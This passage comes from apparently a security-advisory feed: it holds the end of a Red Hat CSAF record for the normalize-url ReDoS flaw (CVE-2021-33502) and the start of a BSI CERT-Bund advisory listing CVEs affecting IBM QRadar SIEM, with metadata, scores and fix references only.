Resource Consumption" }, "discovery_date": "2021-05-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1964461" } ], "notes": [ { "category": "description", "text": "A flaw was found in normalize-url. Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-normalize-url: ReDoS for data URLs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-33502" }, { "category": "external", "summary": "RHBZ#1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-33502", "url": "https://www.cve.org/CVERecord?id=CVE-2021-33502" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539", "url": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539" } ], "release_date": "2021-05-21T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-16T17:21:31+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5171" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-normalize-url: ReDoS for data URLs" } ] }
wid-sec-w-2023-0856
Vulnerability from csaf_certbund
Published
2022-05-31 22:00
Modified
2023-04-04 22:00
Summary
IBM QRadar SIEM: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM QRadar Security Information and Event Management (SIEM) bietet Unterstützung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.
Angriff
Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um die Vertraulichkeit, Integrität und Verfügbarkeit zu gefährden.
Betroffene Betriebssysteme
- Linux
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "IBM QRadar Security Information and Event Management (SIEM) bietet Unterst\u00fctzung bei der Erkennung und Priorisierung von Sicherheitsbedrohungen im Unternehmen.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in IBM QRadar SIEM ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden.", "title": "Angriff" }, { "category": "general", "text": "- Linux", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-0856 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2023-0856.json" }, { "category": "self", "summary": "WID-SEC-2023-0856 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0856" }, { "category": "external", "summary": "IBM Security Bulletin 6980799 vom 2023-04-04", "url": "https://www.ibm.com/support/pages/node/6980799" }, { "category": "external", "summary": "IBM Security Bulletin vom 2022-05-31", "url": "https://www.ibm.com/support/pages/node/6590981" } ], "source_lang": "en-US", "title": "IBM QRadar SIEM: Mehrere Schwachstellen", "tracking": { "current_release_date": "2023-04-04T22:00:00.000+00:00", "generator": { "date": "2024-02-15T17:22:15.406+00:00", "engine": { "name": "BSI-WID", "version": "1.3.0" } }, "id": "WID-SEC-W-2023-0856", "initial_release_date": "2022-05-31T22:00:00.000+00:00", "revision_history": [ { "date": "2022-05-31T22:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-04-04T22:00:00.000+00:00", "number": "2", "summary": "Neue Updates von IBM aufgenommen" } ], "status": "final", "version": "2" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "IBM QRadar SIEM \u003c 3.0.1", "product": { "name": "IBM QRadar SIEM \u003c 3.0.1", "product_id": "T023376", "product_identification_helper": { "cpe": "cpe:/a:ibm:qradar_siem:3.0.1" } } } ], "category": "vendor", "name": "IBM" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-11655", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-11655" }, { "cve": "CVE-2020-11656", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-11656" }, { "cve": "CVE-2020-13434", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-13434" }, { "cve": "CVE-2020-13435", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-13435" }, { "cve": "CVE-2020-13630", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-13630" }, { "cve": "CVE-2020-13631", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-13631" }, { "cve": "CVE-2020-13632", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-13632" }, { "cve": "CVE-2020-15168", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-15168" }, { "cve": "CVE-2020-15358", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-15358" }, { "cve": "CVE-2020-28469", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-28469" }, { "cve": "CVE-2020-7788", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-7788" }, { "cve": "CVE-2020-9327", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2020-9327" }, { "cve": "CVE-2021-22918", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-22918" }, { "cve": "CVE-2021-22930", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-22930" }, { "cve": "CVE-2021-22931", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-22931" }, { "cve": "CVE-2021-22939", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-22939" }, { "cve": "CVE-2021-22940", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-22940" }, { "cve": "CVE-2021-23343", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-23343" }, { "cve": "CVE-2021-23362", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-23362" }, { "cve": "CVE-2021-27290", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-27290" }, { "cve": "CVE-2021-32803", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im Zusammenhang mit bekannten Sicherheitsl\u00fccken in den Komponenten Node.js und SQLite. Ein Angreifer kann diese Schwachstellen ausnutzen, um die Vertraulichkeit, Integrit\u00e4t und Verf\u00fcgbarkeit zu gef\u00e4hrden." } ], "release_date": "2022-05-31T22:00:00Z", "title": "CVE-2021-32803" }, { "cve": "CVE-2021-32804", "notes": [ { "category": "description", "text": "In IBM QRadar SIEM existieren mehrere Schwachstellen im 